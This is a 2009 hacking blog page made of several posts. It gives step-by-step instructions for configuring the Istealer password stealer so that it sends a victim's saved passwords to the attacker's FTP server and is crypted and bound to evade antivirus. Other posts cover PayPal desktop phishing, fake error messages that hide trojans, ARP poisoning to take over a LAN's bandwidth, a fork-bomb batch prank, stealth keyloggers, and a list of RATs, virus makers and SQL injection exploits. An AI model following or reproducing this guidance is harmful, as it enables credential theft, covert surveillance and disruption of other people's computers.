New Post


Friday, July 31, 2009
PDF Decrypt 2009 v1.3.2.83 : Crack any PDF within 5 seconds

PDF Decrypt 2009 v1.3.2.83 : Crack any PDF within 5 seconds

PDF Decrypt 2009 can be used to decrypt protected PDF files, which have "owner" password set, preventing the file from editing(changing), printing, selecting text and graphics(and copying them into the Clipboard), or adding/changing annotations and form fields. PDF decrypt is being done instantly. Decrypted file can be opened in any PDF viewer(e.g. Adobe Acrobat Reader)without any restrictions -- i.e. with edit/copy/print functions enabled. All versions of Adobe Acrobat are supported.

PDF Decrypt 2009 Key Features

* Easy to use.
* Does NOT need Adobe Acrobat software.
* Removing restrictions on printing, editing, copying.
* Decryption is instant.
* Supports PDF1.6 protocol (Acrobat 8.x).
* Supports Adobe Standard 40-bit Encryption and Adobe Advanced 128-bit Encryption.
* Supports AES encryption.
* Supports metadata.

Thursday, July 30, 2009
no image

Remote shutdown windows computer : How to shutdown remote computers

I have explained about various hacks for accessing and hacking computer remotely using RATs. I was asked by many readers about way to shutdown computer remotely. So, I will inform you about
remote shutdown windows hack in this article. After reading this security article, you will be able to remote shutdown windows computer. I have also explained remote computer hacking using Ardamax keylogger in my article FUD Ardamax keylogger.

Remote shutdown windows computer:

A. Get victim computer name :

1. First of all, you need to know the computer name for which you wanna perform remote shutdown. You can obtain computer name by right clicking on My Computer and selecting "Properties".

2. Now, on next screen, you will get Computer name. You should have physical access for this.

B. Remote shutdown windows computer using cmd:

3. Now, when you know the victim computer name which you wanna shutdown remotely, return back to your computer and open command prompt (Start ->Run ->cmd). (Same for both Windows XP and Windows Vista).

4. In command prompt, enter shutdown/i and this window will open:

5. Now, simply click on "Add" and type in your victim computer name to which you wanna perform remote shutdown. You can also set whether to alarm user of shutdown and time period of showing this alarm. Also, in comment type something interesting like "Your computer is infected with TROJAN - HAHAHA". Simply, drives user crazy !!!

Note: For this remote shutdown hack to work, the victim computer must be in your network. Thus, you can use this easily in your schools, colleges or offices.

I hope this remote shutdown tutorial will help you. If you have any problem in this remote shutdown hack, please mention it in comments.

Enjoy remote shutdown...

no image

Istealer : Windows Password stealer to hack find password of email account

Istealer is a Efficient Windows Password Stealer software used to hack email account passwords. I have already explained about Rats and Trojans to hack email account passwords, where you have to send your keylogged file to victim. In the same way, Istealer can be used to hack email account password and find passwords of various emails.

Istealer Password stealer - hack email passwords:

1. Download Istealer password stealer software to hack email account password.

2. Go to and sign up for free account. After creating free ftp server account, enable FTP Access and create a new folder named "Istealer" at your FTP.

3. Run the Loader.exe file present in Istealer folder to get something like:

Istealer windows password stealer

4. Now, simply fill the following in Istealer:
Username and Password: Your username and password for esmartstart ftp server.
Directory: /Istealer

5. You can bind Istealer to any other file by checking "Bind with another file" and giving file path to bind with. Also, you can use Icon Change to change Istealer file icon. This step is optional but, necessary for hiding password stealer from victim's eyes. You can bind password stealer file with fake error message as I have explained in "Fake Error Message generator" to make it look real.

6. To check whether you have entered right ftp server information, hit "Test" and if you have done it right, you will get message "Works perfect". If it says "Cannot connect to FTP Server", you have entered something wrong... just check it again.

7. When you've done all above steps, simply hit on "Build" and save the password stealer file as you want. You can also use Crypter to avoid antivirus detection.

8. Now, simply send this password stealer file to victim and make him run this windows password stealer file on his computer(Social Engineering). After he runs our sent password stealer file on his computer, you will get all passwords and records saved on his computer at your FTP server.

That's it. Thus, you can hack email account password using Istealer- the windows password stealer software. Remember to crypt and then bind this windows Password stealer to make it undetectable by antivirus. If you have any problem in using thisIstealer password stealer softwareto hack email account password, please mention it in comments.

Enjoy Istealer to hack email account password...
Wednesday, July 29, 2009
Google Hacks v1.6

Google Hacks v1.6

Google is a pretty powerful search tool,You knew that. You can use it to find information, but you can also use it to find downloadable MP3s, books, videos, and other items.

We’re going to assume you’re just looking for legally available downloads, but the truth of the matter is if someone’s posted an MP3 (copyrighted or not) to their web page, Google can find it.

But who has the time to memorize all the search modifiers like “-inurlhtm|html|php) intitle:”index of” +”last modified” +”parent directory” +description +size +(.mp3|.wma|.ogg) ?” That’s where Google Hacks comes in. This handy little app will let you search for dozens of file types, song lyrics, cached pages, fonts, and other little goodies hanging out on the web.
Just download and install Google Hacks for Mac, Linux, or Windows, fire it up and enter your search term and check the boxes next to the type of search you want to perform. Your results will show up in your default web browse.

no image

Desktop Phishing: Hack Paypal account password

In my previous article, I mentioned about Hotmail, Yahoo and other account Phishing using Phishers to hack email account password. Desktop phishing is advanced method to hack Paypal account password using Phishing. I will be mentioning this Desktop Phishing in this article. I will demonstrate how to hack Paypal account password using Desktop Phishing.
Desktop Phishing hack Paypal password
Note: Desktop Phishing to hack Paypal account password is illegal. I am not responsible for any action done by you. Hack Paypal account password at your own risk.

What is Desktop Phishing???

Desktop Phishing is one more method of Phishing useful to hack email account passwords. Not only email passwords, but you can hack any account password of site you want. In simple Phishing I mentioned in Phising: Hack an Email account, hacker has to send phisher to victim to his inbox and you have to wait for victim to login with out sent Phisher.

But, in Desktop Phishing, you only have to send the Phisher Arm (If it's phisher in phishing, we call it phisher arm in Desktop Phishing). You have to run server on your computer and save fake page of the website you wanna hack password, in directory of this server.

Now, when you have sent Phisher Arm(I will explain how to make one), ask the victim to install the Phisher Arm(Social Engineering). After installation, whenever victim tries to visit, his browser will show him our Paypal Phisher fake page. When he tries to login to his Paypal account using our Paypal Phisher, his paypal id and password will be recorded in server directory on your computer... thus you can hack Paypal account password.

That's it. Our goal toHack Paypal account passwordachieved using Desktop Phishing. In my next article, I will write step-by-step procedure to hack Paypal account password using Desktop Phishing. One can hack any email account password using Desktop Phishing. I have just taken example of If you have any problem in using Desktop Phishing to hack Paypal account password, just mention it in comments.

Enjoy Desktop Phishing to hack Paypal account password...
Fake error message generator : Hide keylogger and trojan

Fake error message generator : Hide keylogger and trojan

I have already explained about use of Binders and Crypters to hide our keyloggers and trojans. Today, I have written this article to inform you about one more hacking software -
Fake error message creator.
This software is of immense use if you wanna install your RAT server or keylogger remotely. I will tell you how to use this software in this article.

Fake Error message creator:

Suppose, you have sent keylogger or trojan to victim to install it on his computer . He runs the keylogger and gets an error message "Unable to open file- Runtime error". Then he asks you for this message and you can easily say that "May be the file was not supported or was corrupt" and he believes you.

But, in this mean time, your server or keylogger is installed on his computer(without his knowledge) and you start hacking his computer remotely and also extracting passwords from his computer.

This is what a fake error message creator can do. This software helps you to create a fake error message to hide your trojan or keylogger from victim's eyes.

How to use Fake Error message creator:

1. Free Download Fake Error message creator software.

2.Run the software (supports Windows XP and Windows Vista). Now, simply enter the information as you like and want the error message to look like.

3. After filling information, hit on "Build" and you will get "MessageBox.exe" file in current directory. You can bind this "MessageBox.exe" to keylogger to hide it from victim using Binder.

4. I have provided one example below:

Hide trojans and keyloggers

and its resultant fake error message.

Fake error message generator

That's it. Just try out this software to create fake error messages. As already said, this software is worthy for hiding RATs and keyloggers from victim's eyes. If you have any problem in using thisFake error message creator software,please mention it in comments.

Enjoy fake error message creator software...
SeePassword v2.5 : 100% working

SeePassword v2.5 : 100% working

SeePassword v2.5 | Size: 8 MB

When a password appears on screen as a series of asterisks or dots, you simply view it through SeePassword's magnifying glass to reveal the actual password text. See-Password has no problems with passwords stored by Internet Explorer— all the sites will yield their secrets. SeePassword provides users with an easily applied retrieval tool for forgotten passwords.

no image

Hacker's Tool Set (45 Hacking Tools) : MEGA COLLECTION

Hacker's Tool Set (45 Hacking Tools)

IMC Grahams Trojan
IMC Ice Dragon
Myspace Password Cracker
IMC Myspace Phisher
Ultra Surf
Rapid Share Account Gen
MSN Nudge Madness
Ice Reloaded MSN Freezer
IMC Handbook
Lord PS
Hoax Toolbox
IMC Word List
Blues Port Scanner
Bandook RAT v1.35
Project Satan 2.0
EES binder v1.0
File Injector v3
Remote Desktop Spy v4.0
Passive Terror v1.3 Final Edition
Dyn-DL (Dynamic downloader)
Silent Assassin v2.0
Net Scan Tools v4.2
Rocket v1.0
NStealth HTTP Security Scanner v5.8
Attack Toolkit v4.1 & source code included
Legion NetBios Scanner v2.1
Battle Pong
TeraBIT Virus Maker v2.8
p0kes WormGen 2.0
JPS Virus Maker
IRC Ban Protection
IRC Mega Flooder
FTP Brute Hacker
RAR Password Cracker
Vbulletin 3.6.5 Sql Injection Exploit
IPB 2-2.1.5 Sql Injection Exploit
IPB 2-2.1.7 Exploit
Cain & Abel v4.9.3
NetStumbler 0.4.0
Cryptor 1.2
VNC Crack
Mutilate File Wiper 2.92


Tuesday, July 28, 2009
Easy Wifi Radar 1.0.3

Easy Wifi Radar 1.0.3


Easy WiFi Radar is an interesting alternative to the wireless manager in Windows, that helps you simplify the process of finding and connecting to wireless access points.

Specifically, Easy WiFi Radar will perform searches for access points, locate their position on a radar, to analyze the power of each item located, displaying their IDs and log in automatically with the access point most optimal. And all this, with just a mouse click?

Indeed, the best of Easy WiFi Radar is that it is very easy to use. Just run the program to carry out all necessary steps to connect your computer to a wireless access point

Ardamax Keylogger 2.8 with Serials

Ardamax Keylogger 2.8 with Serials


Ardamax Keylogger Features:

Hidden mode - Ardamax Keylogger will run in hidden mode, preventing users from knowing it is
active. It will NOT show in the Uninstall list, the Task Manager, or the Application menu! This
feature makes Ardamax Keylogger absolutely invisible to everyone!

Keystroke monitoring - Track all keystrokes pressed. If a keystroke is pressed, Ardamax Keylogger
will secretly record it and save it to a hidden log file for you to view at a later date.

Email log delivery - Ardamax Keylogger can send your recorded logs via e-mail at set times -
perfect for remote monitoring!

Application tracking - Ardamax Keylogger makes it easy for you to find out where exactly a
keystroke was pressed. Whenever a keystroke is typed, Ardamax Keylogger will record the
application that was in use that received the keystroke!

Time/Date tracking - For extra precision, Ardamax Keylogger allows you to PinPoint the exact time
a window received a keystroke! Perfect for when you leave Ardamax Keylogger running for days at a
time and need to know when a specific keystroke was pressed!

Automatic startup - Ardamax Keylogger will launch itself each and every time you bootup your PC.

Automatic startup in hidden mode - Configure Ardamax Keylogger to start recording keystrokes in
hidden mode.

Selectable log Viewer - Select which file format (plain text or web page) you wish to use to
display your recorded Ardamax Keylogger keystroke logs.

Friendly interface - Ardamax Keylogger contains an extremely easy-to-use user interface, which
will allow you to familiarize yourself with the software in no time at all!


This version is the only version that contains Remote Installation.

Virus Scan:

a-squared - - Nothing Found!
Avira AntiVir - - Nothing Found!
Avast - - Nothing Found!
AVG - - Nothing Found!
BitDefender - - Nothing Found!
ClamAV - - Nothing Found!
Comodo - - Nothing Found!
Dr.Web - - Nothing Found!
Ewido - - Nothing Found!
F-PROT6 - - Nothing Found!
Ikarus T3 - - Nothing Found!
Kaspersky - - Nothing Found!
McAfee - - Nothing Found!
NOD32 v3 - - Nothing Found!
Norman - - Nothing Found!
Panda - - Nothing Found!
QuickHeal - - Nothing Found!
Solo Antivirus - - Nothing Found!
Sophos - - Nothing Found!
TrendMicro - - Nothing Found!
VBA32 - - Nothing Found!
VirusBuster - - Nothing Found!
Saturday, July 25, 2009
WIFI Hacking Tools Browse Internet For Free

WIFI Hacking Tools Browse Internet For Free

WIFI Hacking Tools Browse Internet For Free

I am adding some tools that one can use for hacking a protected WIFI Network. Some of the included applications are- WIFI Radar Aircrack-2.3 802.11 sniffer and WEP/WPA key cracker Easy to use wifi key finder even find key at 128-bit encryption.. WPA-PSK you name it you will find it.

Easy WIFI Radar

Aircrack 2.3 802.11 sniffer

WiFi Hack Tools

Friday, July 24, 2009
no image

Hacking Sites for a budding Hacker : Try your hacking Knowledge

A hacker evolves from many stages,from the lower level script kiddie to the elite level Guru,one needs to be in constant research to develop their soft and hard skills.I m myself learning a lot,and I would like to share 5 Hacking sites,which you must visit,if you want to be an expert in Security.

..[ Phrack Magazine ]..


Phrack is the granddaddy of all the hacking sites out there,and is the world’s oldest hacker ezine,by hackers,for hacker. Described as "the best, and by far the longest running hacker zine” covers deep articles on Hacking and Cracking.A heaven for willing learners,Its articles are worth in gold.


Hakin9 offers an in-depth look at both attack and defense techniques and concentrates on difficult technical issues.Hakin9's target readers are those responsible for IT system security and Programmers, security specialists, professional administrators, as well as people taking up security issues in their free time.


When it comes to getting exploits,few sites are as comprehensive and updated as Milw0rm.Milw0rm provides a one stop platform for almost all security experts along the world to publish their new found exploits on the web so that other can study them for good or worse.

Hack this Site

Wanna test your hacking skills ? Hack This Site puts your skills to an ultimate test as it throws you real life challenges of almost every type,Trust me,If you have it in you,visit and complete its missions and nothing can beat you.


A great collection of articles and podcasts on security,one has to visit 2600 to get a feel what hacking is.


no image

Award Keylogger 1.4 FULL

Award Keylogger 1.4 | 6.5MB

Award Keylogger is fast, invisible and easy-to-use surveillance tool that allows you to find out what other users do on your computer in your absence. It records every keystroke to a log file. The log file can be sent secretly with email or FTP to a specified receiver. Award Keylogger can also detection specified keywords and take a screenshot whenever one is typed, displaying findings in a tidy log viewer. It causes no suspicious slowdowns and takes very few system resources. all this is happening in full stealth mode so the person you are monitoring will never be aware of it.



Thursday, July 23, 2009
no image

Keylogger Spy-kpdo 3.0


Well this version 3.0 and Spy-keylogger kpdo this available more complete and objective
it has functions such as selecting the options available and that the client generates the server

* Start with the windows.

* start using the Run folder in msconfig.

* Choose the length of server (. exe,. scr,. bat,. com.cmd,. pif).

* choose the icon from the server it self is compress with UPX after create.

* Set the time for sending logs.

* choose whether to capture photos or not.

* also choose Clipboard ( 'CTRL + V).

* arrives in the logs. html (type BPK Capturing Handle + Active Time).

* Can you also test if the logs will send or not. and has also Binder (combine files).

* for Command. Bat in the server.

* to change icons just copies the icons in the folder skin.

* has also (when you run the Stealth server it self is created in another place and closes the application runs, and runs in that directory there giving person pa delete the file is not executed and finalize the process as it because it ends the windows will direct pa bios (this file name of the USA system) ) Server

* Created 240 Kb varies from ~ 280 kb icon for that

* And when the victim is not connected Internet messages do not appear to error

Wednesday, July 22, 2009
no image

Net Spy Pro v4.0.36

Net Spy Pro is the latest in employee and student network monitoring software. This program allows you to monitor all user activity on your network in real time from your own workstation.

This program makes it easy to see which users are wasting time at any given moment. Are your employees wasting time online or leaking sensitive data? Do your students visit inappropriate sites?

Quickly view detailed user activity logs or view multiple user screens in real time! Zoom in on problem users and filter activity. With NSP, you can even watch keystrokes as they are typed LIVE!


Tuesday, July 21, 2009
Getting Max Internet Speed using ARP Poisoning

Getting Max Internet Speed using ARP Poisoning

Ever thought of stealing bandwidth of internet in a local Lan ? well..I usually do it when I am surfing net at night and need more speed for downloading games and I do it using Linuxmovies..and you can do that too. Well its done using ARP Poisoning..Sounds geeky but its the technical name of network sniffing.Basically,sniffing is used to get passwords – encrypted or unencrypted in a network. But it can also be used to choke the network bandwidth and getting maximum bandwidth in a single system. For those who don't know how it happens,lemme give you a little insight on how it happens.

Below is an example of a normal network.Now as we can see,that we are working on a laptop and we have to sniff out a target computer .All the systems are getting data via a switch which is itself connected to a router.The Router has a MAC address which is in this case is not binded to a particular IP. All the data is routed to a switch which is catered to systems using a switch.

The systems connect to router through the MAC address of router.Technically,we have to spoof the MAC address of router so all the data is sent through our system (the laptop in this case) and we are able to see and analyze each packet of data.In simple words this process of spoofing is known as ARP poisoning.Also,in normal condition,data sent through LAN is unencrypted in nature.

As we can see in the above diagram,we have now spoofed the MAC address and the data is sent through our system and we can view passwords and data.

But hey wait..I said that I will tell you how to get maximum speeds ain’t it ? well..its easy. When you poison a network,and spoof the address,but if you have not yet started sniffing,then all the systems will look for data to your system and will not be able to access net.And you will be playing with full bandwidth !!!

To do this, Download Ettercap and poison the network (shift + U then control + S some homework and get the idea) but DONT START SNIFFING.Once you have poisoned it,you will be able to surf internet at maximum bandwidth whereas others wont.I used to do it in my net connection at night so nobody was able to complaint and stop it as soon as my downloads finished so I was way away from the hands of Law.BTW Ettercap is one of the best available tool for sniffing any network out there. I love it..


PS : If you wanna check if your network is sniffed or not, go to -

Start Menu –> Run –> type CMD and press Enter.

The type without quotes “ARP –a”

If you network is being sniffed,then all the MAC address will be the same.

I hope it was informative.

Keep Learning

no image

Firefox Ultimate Optimizer 2009

Firefox Ultimate Optimizer 2009
Firefox Optimizers for Mozilla Firefox v1.x / 2.x / 3.x was developed for an easy and fast optimization of your browsing experience with Firefox. It is based on a collection of popular and well working optimization settings used and tested by the experts. Usually you have to optimize Firefox manually, which can be time consuming and difficult for the novice user. FireTune helps you here - it includes all the performance optimizations. The only thing you must do is: make your selection. Firefox Optimizers does the work for you.Details on what exactly Optimizers does can be found in the help file.
In most of all cases you'll notice an improved browsing speed after optimizing Firefox.
Would you use a program that would reduce the memory usage of Firefox to 100-200 Kilobyte ? I have no idea how the Firefox Ultimate Optimizer is reducing the memory usage to this amount but the task manager is verifying the reduction. Firefox has been using roughly 40 Megabytes of RAM whenever I started it and one homepage was loaded.

After starting Firefox Ultimate Optimizer the RAM usage was reduced to 188 Kilobyte even with Firefox as the active window. The software does not have to be configured and sits in the system tray all the time.

Download Links...
Monday, July 20, 2009
no image

How to Freeze Someone's Computer (Completely Harmless)

This is a way you can freeze a friend's computer as a prank, and it is completely harmless and does no damage. It creates a batch file that opens command prompt so many times, you computer freezes up.


  1. Open Notepad.
  2. Type "start" then type the name of what your batch file will be.
  3. Click enter and re-type the thing you wrote above.
  4. Save it any where you want and name it anything that ends with a .bat in the end.
  5. Put it on a friends computer and enjoy.


  • This only works on Windows Vista or Windows XP
  • You might want to change the icon to make it more realistic.


  • Sending batch files over the internet is not illegal, but it is not a good idea to do so.
  • The only way to unfreeze the computer is to turn it off, so any unsaved work will be lost.

Sunday, July 19, 2009
How to Recover Deleted History in Windows

How to Recover Deleted History in Windows

As most of us know, Windows records a number of user activities in log files. These logs, (AKA 'History'), can be deleted by users concerned about privacy issues. Once History has been deleted, performing a forensic audit on user activity is made much harder.

This 'How To' presents means of recovering History that has been previously deleted from a PC, such as:

  • Internet History (including cookies).
  • Recently opened documents.
  • Search History.
  • Run History.
  • Open/Save History.


  1. The easy and quick way to restore file and activity History is the System Restore feature. Since much history is saved into the Windows Registry, restoring it to a previous state will restore file and program History.

    • Choose a date you would like the computer reverted to .
    • Enjoy restored History.
  2. But the story doesn't stop here! Perhaps System Restore was disabled by a user, or it is inappropriate to use it .Well, let's try another tactic. There are lesser known log files that Windows keeps, which are independent of both the Registry and individual Program logs. They are called "index.dat" files. Use the Windows Search Tool to find all occurrences of "index.dat" on your C: drive.

    • On XP, click Start, and Search, then For Files & Folders, and All Files & Folders, now enter "index.dat" in the Filename field. Before searching:

      • Limit the search to C: drive using the Look In drop-down.
      • Check the following options using the More Advanced Options line:
        1. Search System Files
        2. Search Hidden Files & Folders
        3. Search Subfolders
      • Click printscreen.
      • Be amazed at how many "index.dat" files there are.
      • Minimize the Search Results window.
    • You need a tool to read the index.dat files. They are NOT text files.

      • Super WinSpy is one such reader, but it's infected. Or search Google for "index.dat reader". (Right-click on the Google link and select Open in New Window).
      • Download the software, check it for viruses (as you do for all downloads) and install it. Start the program. You can enjoy different Histories, using the button provided.


  • Use undelete software if your log files have been deleted accidentally.
  • Check the computer for Usage Track eraser programs. One such program may have been used on your computer. All the following programs can erase tracks:
    1. Tracks Eraser Pro - Registry entries plus index.dat files.
    2. Microsoft AntiSpyware - Registry entries.
    3. Adaware - Registry entries.
    4. Spybot S&D - Registry entries.
  • If a user has used advanced tools to erase usage tracks, program logs, registry history and the index.dat files, restore is more difficult. Try using a disk editor to directly access hard disk sectors.
  • It won't come as a surprise that the people who makes products that cover your Usage Tracks, also make software for viewing those tracks.
  • One tool that can often get around the track-erasing software is NetAnalysis, by Craig Wilson of Digital Detective in the UK. One function of this computer forensic software is to search the hard disk for references that are no longer part of the index.dat file, and reconstruct additional history that cannot be found in the index.dat file. It is common to find tens of thousands of entires, and not uncommon to find hundreds of thousands. The resource for this statement is my own experience in using the tool.


  • Satisfy yourself that you have a right to alter computer settings. Changing computer content without legal right is a crime in many countries.
  • Check with your Anti-Virus log files that your sytem was clean at the time before selecting a date with the System Restore tool. You wouldn't want to resurrect a virus.
  • When you use System Restore to revert the registry to a previous date, programs installed after that date may not work correctly. If you have any doubt, use the "index.dat" viewing method.

Designed by Hackingloops.